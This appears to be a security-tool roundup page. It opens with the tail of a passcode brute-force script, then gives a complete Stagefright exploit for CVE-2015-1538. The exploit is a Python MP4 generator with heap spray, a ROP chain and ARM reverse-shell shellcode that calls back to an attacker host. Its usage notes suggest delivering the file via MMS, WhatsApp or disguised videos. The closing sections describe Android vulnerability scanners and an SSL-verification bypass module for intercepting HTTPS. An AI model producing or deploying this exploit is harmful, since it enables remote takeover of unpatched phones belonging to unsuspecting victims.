			GUESS_HASH = generateHash( passcode, SALT, MODEL )
			# CompareHash
			if GUESS_HASH == HASH_SHA1:
				print "Found! Passcode = " +  passcode
				exit()

	# Not found...
	print "Bad luck... Is that your specific model?"
	exit()

except KeyboardInterrupt:
	exit()

Source: https://github.com/PentesterES

DISCLAIMER: This exploit is for testing and educational purposes only. Any other usage for this code is not allowed. Use at your own risk.

Exploit for RCE Vulnerability CVE-2015-1538. Integer Overflow in the libstagefright MP4 ‘stsc’ atom handling.
Don’t forget, the output of “create_mp4” can be delivered with many ways: likes; Packet Injection, MiTM method using Music Videos, Porn Videos, Blackberry Message, WhatsApp & MMS, MMS is the most dangerous attack vector, but not the only one.

usage:
– Rename Stagefright.py to mp4.py
– python mp4.py -h (to print help)
– example : python mp4.py -c 192.162.1.2 -p 445 -o honeymoon.mp4

Stagefright Android exploit V-2

stagefright_2.py Script:

#!/usr/bin/env python
# Jason "jaythaceo" Brooks
# Shout out to our friend Joshua J. Drake (@jduck) of ZIMPERIUM zLabs
# Shout outs to our friends at Optiv (formerly Accuvant Labs)
# Shout outs to our friends Anonymous for asking about this exploit
# Mobile Threat Protection, 2015
# twitter.com/jaythaceo
#
# Exploit for RCE Vulnerability CVE-2015-1538 #1
# Integer Overflow in the libstagefright MP4 'stsc' atom handling
#
# Don't forget, the output of "create_mp4" can be delivered many ways!
# MMS is the most dangerous attack vector, but not the only one...
#
# DISCLAIMER: This exploit is for testing and educational purposes only. Any
# other usage for this code is not allowed. Use at your own risk.
#
# "With great power comes great responsibility." - Uncle Ben
#

import struct
import socket


#
# Creates a single MP4 atom - LEN, TAG, DATA
#
def make_chunk(tag, data):
    if len(tag) != 4:
        raise 'Yo! They call it "FourCC" for a reason.'
    ret = struct.pack('>L', len(data) + 8)
    ret += tag
    ret += data
    return ret


#
# Make an 'stco' atom - Sample Table Chunk Offets
#
def make_stco(extra=''):
    ret =  struct.pack('>L', 0) # version
    ret += struct.pack('>L', 0) # mNumChunkOffsets
    return make_chunk('stco', ret+extra)

#
# Make an 'stsz' atom - Sample Table Size
#
def make_stsz(extra=''):
    ret =  struct.pack('>L', 0) # version
    ret += struct.pack('>L', 0) # mDefaultSampleSize
    ret += struct.pack('>L', 0) # mNumSampleSizes
    return make_chunk('stsz', ret+extra)

#
# Make an 'stts' atom - Sample Table Time-to-Sample
#
def make_stts():
    ret =  struct.pack('>L', 0) # version
    ret += struct.pack('>L', 0) # mTimeToSampleCount
    return make_chunk('stts', ret)


#
# This creates a single Sample Table Sample-to-Chunk entry
#
def make_stsc_entry(start, per, desc):
    ret = ''
    ret += struct.pack('>L', start + 1)
    ret += struct.pack('>L', per)
    ret += struct.pack('>L', desc)
    return ret

#
# Make an 'stsc' chunk - Sample Table Sample-to-Chunk
#
# If the caller desires, we will attempt to trigger (CVE-2015-1538 #1) and
# cause a heap overflow.
#
def make_stsc(num_alloc, num_write, sp_addr=0x42424242, do_overflow = False):
    ret =  struct.pack('>L', 0) # version/flags

    # this is the clean version...
    if not do_overflow:
        ret += struct.pack('>L', num_alloc) # mNumSampleToChunkOffsets
        ret += 'Z' * (12 * num_alloc)
        return make_chunk('stsc', ret)

    # now the explicit version. (trigger the bug)
    ret += struct.pack('>L', 0xc0000000 + num_alloc) # mNumSampleToChunkOffsets

    # fill in the entries that will overflow the buffer
    for x in range(0, num_write):
        ret += make_stsc_entry(sp_addr, sp_addr, sp_addr)

    ret = make_chunk('stsc', ret)

    # patch the data_size
    ret = struct.pack('>L', 8 + 8 + (num_alloc * 12)) + ret[4:]

    return ret

#
# Build the ROP chain
#
# ROP pivot by Georg Wicherski! Thanks!
#
"""
(gdb) x/10i __dl_restore_core_regs
   0xb0002850 <__dl_restore_core_regs>: add r1, r0, #52 ; 0x34
   0xb0002854 <__dl_restore_core_regs+4>:   ldm r1, {r3, r4, r5}
   0xb0002858 <__dl_restore_core_regs+8>:   push    {r3, r4, r5}
   0xb000285c <__dl_restore_core_regs+12>:  ldm r0, {r0, r1, r2, r3, r4, r5, r6, r7, r8, r9, r10, r11}
   0xb0002860 <__dl_restore_core_regs+16>:  ldm sp, {sp, lr, pc}
"""

"""
b0001144 <__dl_mprotect>:
b0001144:       e92d0090        push    {r4, r7}
b0001148:       e3a0707d        mov     r7, #125        ; 0x7d
b000114c:       ef000000        svc     0x00000000
b0001150:       e8bd0090        pop     {r4, r7}
b0001154:       e1b00000        movs    r0, r0
b0001158:       512fff1e        bxpl    lr
b000115c:       ea0015cc        b       b0006894 <__dl_raise+0x10>
"""

def build_rop(off, sp_addr, newpc_val, cb_host, cb_port):
    rop = ''
    rop += struct.pack('<L', sp_addr + off + 0x10) # new sp
    rop += struct.pack('<L', 0xb0002a98)           # new lr - pop {pc}
    rop += struct.pack('<L', 0xb00038b2+1)         # new pc: pop {r0, r1, r2, r3, r4, pc}

    rop += struct.pack('<L', sp_addr & 0xfffff000) # new r0 - base address (page aligned)
    rop += struct.pack('<L', 0x1000)               # new r1 - length
    rop += struct.pack('<L', 7)                    # new r2 - protection
    rop += struct.pack('<L', 0xd000d003)           # new r3 - scratch
    rop += struct.pack('<L', 0xd000d004)           # new r4 - scratch
    rop += struct.pack('<L', 0xb0001144)           # new pc - _dl_mprotect

    native_start = sp_addr + 0x80
    rop += struct.pack('<L', native_start)         # address of native payload
    #rop += struct.pack('<L', 0xfeedfed5)          # top of stack...
    # linux/armle/shell_reverse_tcp (modified to pass env and fork/exit)
    buf =  ''
    # fork
    buf += '\x02\x70\xa0\xe3'
    buf += '\x00\x00\x00\xef'
    # continue if not parent...
    buf += '\x00\x00\x50\xe3'
    buf += '\x02\x00\x00\x0a'
    # exit parent
    buf += '\x00\x00\xa0\xe3'
    buf += '\x01\x70\xa0\xe3'
    buf += '\x00\x00\x00\xef'
    # setsid in child
    buf += '\x42\x70\xa0\xe3'
    buf += '\x00\x00\x00\xef'
    # socket/connect/dup2/dup2/dup2
    buf += '\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x05\x20\x81\xe2\x8c'
    buf += '\x70\xa0\xe3\x8d\x70\x87\xe2\x00\x00\x00\xef\x00\x60'
    buf += '\xa0\xe1\x6c\x10\x8f\xe2\x10\x20\xa0\xe3\x8d\x70\xa0'
    buf += '\xe3\x8e\x70\x87\xe2\x00\x00\x00\xef\x06\x00\xa0\xe1'
    buf += '\x00\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00\x00\xef\x06'
    buf += '\x00\xa0\xe1\x01\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00'
    buf += '\x00\xef\x06\x00\xa0\xe1\x02\x10\xa0\xe3\x3f\x70\xa0'
    buf += '\xe3\x00\x00\x00\xef'
    # execve(shell, argv, env)
    buf += '\x30\x00\x8f\xe2\x04\x40\x24\xe0'
    buf += '\x10\x00\x2d\xe9\x38\x30\x8f\xe2\x08\x00\x2d\xe9\x0d'
    buf += '\x20\xa0\xe1\x10\x00\x2d\xe9\x24\x40\x8f\xe2\x10\x00'
    buf += '\x2d\xe9\x0d\x10\xa0\xe1\x0b\x70\xa0\xe3\x00\x00\x00'
    buf += '\xef\x02\x00'
    # Add the connect back host/port
    buf += struct.pack('!H', cb_port)
    cb_host = socket.inet_aton(cb_host)
    buf += struct.pack('=4s', cb_host)
    # shell -
    buf += '/system/bin/sh\x00\x00'
    # argv -
    buf += 'sh\x00\x00'
    # env -
    buf += 'PATH=/sbin:/vendor/bin:/system/sbin:/system/bin:/system/xbin\x00'

    # Add some identifiable stuff, just in case something goes awry...
    rop_start_off = 0x34
    x = rop_start_off + len(rop)
    while len(rop) < 0x80 - rop_start_off:
        rop += struct.pack('<L', 0xf0f00000+x)
        x += 4

    # Add the native payload...
    rop += buf

    return rop

#
# Build an mp4 that exploits CVE-2015-1538 #1
#
# We mimic meow.3gp here...
#
def create_mp4(sp_addr, newpc_val, cb_host, cb_port):
    chunks = []

    # Build the MP4 header...
    ftyp =  'mp42'
    ftyp += struct.pack('>L', 0)
    ftyp += 'mp42'
    ftyp += 'isom'
    chunks.append(make_chunk('ftyp', ftyp))

    # Note, this causes a few allocations...
    moov_data = ''
    moov_data += make_chunk('mvhd',
        struct.pack('>LL', 0, 0x41414141) +
        ('B' * 0x5c) )

    # Add a minimal, verified trak to satisfy mLastTrack being set
    moov_data += make_chunk('trak',
        make_chunk('stbl',
            make_stsc(0x28, 0x28) +
            make_stco() +
            make_stsz() +
            make_stts() ))

    # Spray the heap using a large tx3g chunk (can contain binary data!)
    """
       0x4007004e <_ZNK7android7RefBase9decStrongEPKv+2>:   ldr r4, [r0, #4]  ; load mRefs
       0x40070050 <_ZNK7android7RefBase9decStrongEPKv+4>:   mov r5, r0
       0x40070052 <_ZNK7android7RefBase9decStrongEPKv+6>:   mov r6, r1
       0x40070054 <_ZNK7android7RefBase9decStrongEPKv+8>:   mov r0, r4
       0x40070056 <_ZNK7android7RefBase9decStrongEPKv+10>:  blx 0x40069884    ; atomic_decrement
       0x4007005a <_ZNK7android7RefBase9decStrongEPKv+14>:  cmp r0, #1        ; must be 1
       0x4007005c <_ZNK7android7RefBase9decStrongEPKv+16>:  bne.n   0x40070076 <_ZNK7android7RefBase9decStrongEPKv+42>
       0x4007005e <_ZNK7android7RefBase9decStrongEPKv+18>:  ldr r0, [r4, #8]  ; load refs->mBase
       0x40070060 <_ZNK7android7RefBase9decStrongEPKv+20>:  ldr r1, [r0, #0]  ; load mBase._vptr
       0x40070062 <_ZNK7android7RefBase9decStrongEPKv+22>:  ldr r2, [r1, #12] ; load method address
       0x40070064 <_ZNK7android7RefBase9decStrongEPKv+24>:  mov r1, r6
       0x40070066 <_ZNK7android7RefBase9decStrongEPKv+26>:  blx r2            ; call it!
    """
    page = ''
    off = 0  # the offset to the next object
    off += 8
    page += struct.pack('<L', sp_addr + 8 + 16 + 8 + 12 - 28)    # _vptr.RefBase (for when we smash mDataSource)
    page += struct.pack('<L', sp_addr + off) # mRefs
    off += 16
    page += struct.pack('<L', 1)             # mStrong
    page += struct.pack('<L', 0xc0dedbad)    # mWeak
    page += struct.pack('<L', sp_addr + off) # mBase
    page += struct.pack('<L', 16)            # mFlags (dont set OBJECT_LIFETIME_MASK)
    off += 8
    page += struct.pack('<L', sp_addr + off) # the mBase _vptr.RefBase
    page += struct.pack('<L', 0xf00dbabe)    # mBase.mRefs (unused)
    off += 16
    page += struct.pack('<L', 0xc0de0000 + 0x00)  # vtable entry 0
    page += struct.pack('<L', 0xc0de0000 + 0x04)  # vtable entry 4
    page += struct.pack('<L', 0xc0de0000 + 0x08)  # vtable entry 8
    page += struct.pack('<L', newpc_val)          # vtable entry 12
    rop = build_rop(off, sp_addr, newpc_val, cb_host, cb_port)
    x = len(page)
    while len(page) < 4096:
        page += struct.pack('<L', 0xf0f00000+x)
        x += 4

    off = 0x34
    page = page[:off] + rop + page[off+len(rop):]
    spray = page * (((2*1024*1024) / len(page)) - 20)
    moov_data += make_chunk('tx3g', spray)
    block = 'A' * 0x1c
    bigger = 'B' * 0x40
    udta = make_chunk('udta',
        make_chunk('meta',
            struct.pack('>L', 0) +
            make_chunk('ilst',
                make_chunk('cpil',    make_chunk('data', struct.pack('>LL', 21, 0) + 'A')) +
                make_chunk('trkn',    make_chunk('data', struct.pack('>LL', 0, 0) + 'AAAABBBB')) +
                make_chunk('disk',    make_chunk('data', struct.pack('>LL', 0, 0) + 'AAAABB')) +
                make_chunk('covr',    make_chunk('data', struct.pack('>LL', 0, 0) + block)) * 32 +
                make_chunk('\xa9alb', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
                make_chunk('\xa9ART', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
                make_chunk('aART',    make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
                make_chunk('\xa9day', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
                make_chunk('\xa9nam', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
                make_chunk('\xa9wrt', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
                make_chunk('gnre',    make_chunk('data', struct.pack('>LL', 1, 0) + block)) +
                make_chunk('covr',    make_chunk('data', struct.pack('>LL', 0, 0) + block)) * 32 +
                make_chunk('\xa9ART', make_chunk('data', struct.pack('>LL', 0, 0) + bigger)) +
                make_chunk('\xa9wrt', make_chunk('data', struct.pack('>LL', 0, 0) + bigger)) +
                make_chunk('\xa9day', make_chunk('data', struct.pack('>LL', 0, 0) + bigger)))
            )
        )
    moov_data += udta

    # Make the nasty trak
    tkhd1 = ''.join([
        '\x00',       # version
        'D' * 3,      # padding
        'E' * (5*4),  # {c,m}time, id, ??, duration
        'F' * 0x10,   # ??
        struct.pack('>LLLLLL',
            0x10000,  # a00
            0,        # a01
            0,        # dx
            0,        # a10
            0x10000,  # a11
            0),       # dy
        'G' * 0x14
        ])

    trak1 = ''
    trak1 += make_chunk('tkhd', tkhd1)

    mdhd1 = ''.join([
        '\x00',       # version
        'D' * 0x17,   # padding
        ])

    mdia1 = ''
    mdia1 += make_chunk('mdhd', mdhd1)
    mdia1 += make_chunk('hdlr', 'F' * 0x3a)

    dinf1 = ''
    dinf1 += make_chunk('dref', 'H' * 0x14)

    minf1 = ''
    minf1 += make_chunk('smhd', 'G' * 0x08)
    minf1 += make_chunk('dinf', dinf1)

    # Build the nasty sample table to trigger the vulnerability here.
    stbl1 = make_stsc(3, (0x1200 / 0xc) - 1, sp_addr, True) # TRIGGER

    # Add the stbl to the minf chunk
    minf1 += make_chunk('stbl', stbl1)

    # Add the minf to the mdia chunk
    mdia1 += make_chunk('minf', minf1)

    # Add the mdia to the track
    trak1 += make_chunk('mdia', mdia1)

    # Add the nasty track to the moov data
    moov_data += make_chunk('trak', trak1)

    # Finalize the moov chunk
    moov = make_chunk('moov', moov_data)
    chunks.append(moov)

    # Combine outer chunks together and voila.
    data = ''.join(chunks)

    return data

if __name__ == '__main__':
    import sys
    import mp4
    import argparse

    def write_file(path, content):
        with open(path, 'wb') as f:
            f.write(content)

    def addr(sval):
        if sval.startswith('0x'):
            return int(sval, 16)
        return int(sval)

    # The address of a fake StrongPointer object (sprayed)
    sp_addr   = 0x41d00010  # takju @ imm76i - 2MB (via hangouts)

    # The address to of our ROP pivot
    newpc_val = 0xb0002850 # point sp at __dl_restore_core_regs

    # Allow the user to override parameters
    parser = argparse.ArgumentParser()
    parser.add_argument('-c', '--connectback-host', dest='cbhost', default='31.3.3.7')
    parser.add_argument('-p', '--connectback-port', dest='cbport', type=int, default=12345)
    parser.add_argument('-s', '--spray-address', dest='spray_addr', type=addr, default=None)
    parser.add_argument('-r', '--rop-pivot', dest='rop_pivot', type=addr, default=None)
    parser.add_argument('-o', '--output-file', dest='output_file', default='cve-2015-1538-1.mp4')
    args = parser.parse_args()

    if len(sys.argv) == 1:
        parser.print_help()
        sys.exit(-1)

    if args.spray_addr == None:
        args.spray_addr = sp_addr
    if args.rop_pivot == None:
        args.rop_pivot = newpc_val

    # Build the MP4 file...
    data = mp4.create_mp4(args.spray_addr, args.rop_pivot, args.cbhost, args.cbport)
    print('[*] Saving crafted MP4 to %s ...' % args.output_file)
    write_file(args.output_file, data)

Source : https://github.com/jaythaceo

AndroBugs Framework is an Android vulnerability analysis system that helps developers or hackers find potential security vulnerabilities in Android applications. No splendid GUI interface, but the most efficient (less than 2 minutes per scan in average) and more accurate.

AndroBugs Framework – Android App Security Vulnerability Scanner.

Features:
+ Find security vulnerabilities in an Android app
+ Check if the code is missing best practices
+ Check dangerous shell commands (e.g. “su”)
+ Collect Information from millions of apps
+ Check the app’s security protection (marked as <Hacker>, designed for app repackaging hacking)

Steps by Steps and Usage for Windows

Easy to use for Android developers or hackers on Microsoft Windows: (a) No need to install Python 2.7 (b) No need to install any 3rd-party library (c) No need to install AndroBugs Framework
1. mkdir C:\AndroBugs_Framework
2. cd C:\AndroBugs_Framework
3. Unzip the latest Windows version of AndroBugs Framework from Windows releases
4. Go to Computer->System Properties->Advanced->Environment Variables. Add “C:\AndroBugs_Framework” to the “Path” variable
5. androbugs.exe -h
6. androbugs.exe -f [APK file]

Massive Analysis Tool Steup Steps and Usage for Windows
1. Complete the Steup Steps and Usage for Windows first
2. Install the Windows version of MongoDB (https://www.mongodb.org/downloads)
3. Install PyMongo library
4. Config your own MongoDB settings: C:\AndroBugs_Framework\androbugs-db.cfg
5. Choose your preferred MongoDB management tool (http://mongodb-tools.com/)
— AndroBugs_MassiveAnalysis.exe -h
++ Example: AndroBugs_MassiveAnalysis.exe -b 20151112 -t BlackHat -d .\All_Your_Apps\ -o
+++ .\Massive_Analysis_Reports
6. AndroBugs_ReportByVectorKey.exe -h
— Example: AndroBugs_ReportByVectorKey.exe -v WEBVIEW_RCE -l Critical -b 20151112 -t BlackHat

Installation :
– git clone https://github.com/AndroBugs/AndroBugs_Framework
– cd <your folder> AndroBugs_Framework

Download : AndroBugs_Framework.zip(3.5 MB)
Source : https://github.com/AndroBugs
Email : androbugs.framework@gmail.com

Changelog v-11:
+ Sort vulnerabilities by date of CVE descending
+ Enable WeakSauce check
+ Fix crashes with x509 serialization check on devices < Kitkat
+ Add check for CVE-2015-1528
+ Fix some UI state bugs
+ Small grammar fixes

This tool was meant to show the end user the attack surface that a given device is susceptible to. In implementing these checks we attempt to minimize or eliminate both false positives/false negatives without negatively affecting system stability.

hammerhead-user 5.1.1 LMY48I 2074855 release-keys

Latest Change 9/14/2015:
– Bunary and Application/App; Add header + some links for the x509 serialization bug.
– Update buildscript.

Rationale for necessity:
When a vulnerability is discovered, Google receives word and applies a patch to Android. The Nexus devices are usually the devices that receive these patches quickest as they deviate the least (read: not at all) from AOSP (Android Open Source Project – The core of Android, where Google commits to). The lag time between learning about a bug and the time when a patch is applied to a device can still be significant (for OEMs, it can be > 1 year or never). For example, the futex bug (CVE-2014-3153/Towelroot) was known about in late May, early June. This bug is still not patched on my latest Nexus 5 (Android 4.4.4). This leaves users extremely vulnerable to attack from applications. Users mostly do not know that their devices are vulnerable and this tool is meant to give visibility into the vulnerabilities a given device is susceptible to.

Lifecycle of a patch:
Samsung, HTC, and every other OEM keep heavily customized versions of Android. The patch deployment infrastructure from OEMS -> carriers -> users is in disarray. The OEMs receive the patches from Google and spend weeks or months applying these to some devices and testing. Then they ship off the device updates to the carrier who is responsible for pushing them to the end user. They then go through another QA cycle from the carrier.

Implementation :
Vulnerabilities in a device can exist at many layers inside of Android. For example, a bug can exist in the kernel (Towelroot, for example) or it can exist in the Android specific framework (Android Masterkeys/FakeID). Some of the kernel bugs can sometimes be difficult to check for without potentially causing system instability. This implementation takes care to not include checks that could cause instability problems for the end user and therefore may omit checks that could cause these types of issues. The framework is very thin at the current time and consists of a vector of vulnerability checks. Their concrete implementations vary wildly depending on the bug.
A list of current bug checks:
+ ZipBug9950697
+ Zip Bug 8219321 / Master keys
+ Zip Bug 9695860
+ Jar Bug 13678484 / Android FakeID
+ CVE 2013-6282 / put/get_user
+ CVE_2011_1149 / PSNueter / Ashmem Exploit
+ CVE_2014_3153 / Futex bug / Towelroot
+ CVE 2014-3847 / WeakSauce
+ StumpRoot
+ Stagefright bugs
+ x509 Serialization bug

Previous work:
There have been attempts before to solve this issue. xray.io Xray works by actually attempting the exploit which doesn’t satisfy our system stability constraint. There also exist other applications which attempt to determine a devices attack surface by simply using a lookup based on Android verison/build information. This causes both false negatives and false positives. Imagine the case where an OEM has back ported a fix to a device, but the check solely relies on an Android device; false positive. The case where an OEM upgrades to an Android version/kernel version which includes patches, but manages to break them causes the case of a false negative.

ZTE-Compel-4.4.2

Download : android-VTS.apk(2.01 MB)
Source : https://github.com/nowsecure | Our Post Before

SSLKiller is used for killing SSL verification functions on Android client side. With SSLKiller, You can intercept app’s HTTPS communication packages between the client and server. This project is very helpful for those who wants to analysis the network communications in android apps but with HTTPS deployment.

This project is build as a Xposed module. Before using it, you have to install Xposed on your Android device first!
– http://forum.xda-developers.com/showthread.php?t=3034811
– http://repo.xposed.info/module/de.robv.android.xposed.installer
– https://github.com/rovo89/XposedInstaller

Burp Suit can help us to deploy a MITM and intercept transparent http packages. When meets https transaction, burp uses a fake server cert to communicate with the client. If app has a uncorrect cert verification process (e.g. an empty TrustManager implementation) the https packages can be intercepted by burp but if app do the right verification, burp will alert connection failed error. SSLKiller can fix this problem and let all https transaction of the app displayed in burp.

SSL Verification Preview

Download : SSLKiller.zip(588 KB)
Source : https://github.com/liuyufei

Horus is a security framework for pentesting android Apps.

A mobile pentesting framework written in Python.

Latest Change 9/1/2016:
+ Updated requirements
+ Integrated and using androwarn
+ Fixed all androguard issues

TOOLS INCLUDED
+ androguard as the main static analyzer backend
+ androwarn
+ androbugs framework

Example Horus analysis

Installation:
1. Clone the repository (git clone https://github.com/delta24/horus)
2. Install virtualenv. (the package name maybe different depending on the distro)
3. Set-up a virtualenv, say env by running mkvirtualenv env -p /usr/bin/python2.
4. Activate the virtualenv source env/bin/activate.
5. Install dependencies using pip install -r requirements.txt.
6. Create a DB based on the models, python manage.py createdb.
7. Run the Flask server using python manage.py runserver

Source : https://github.com/delta24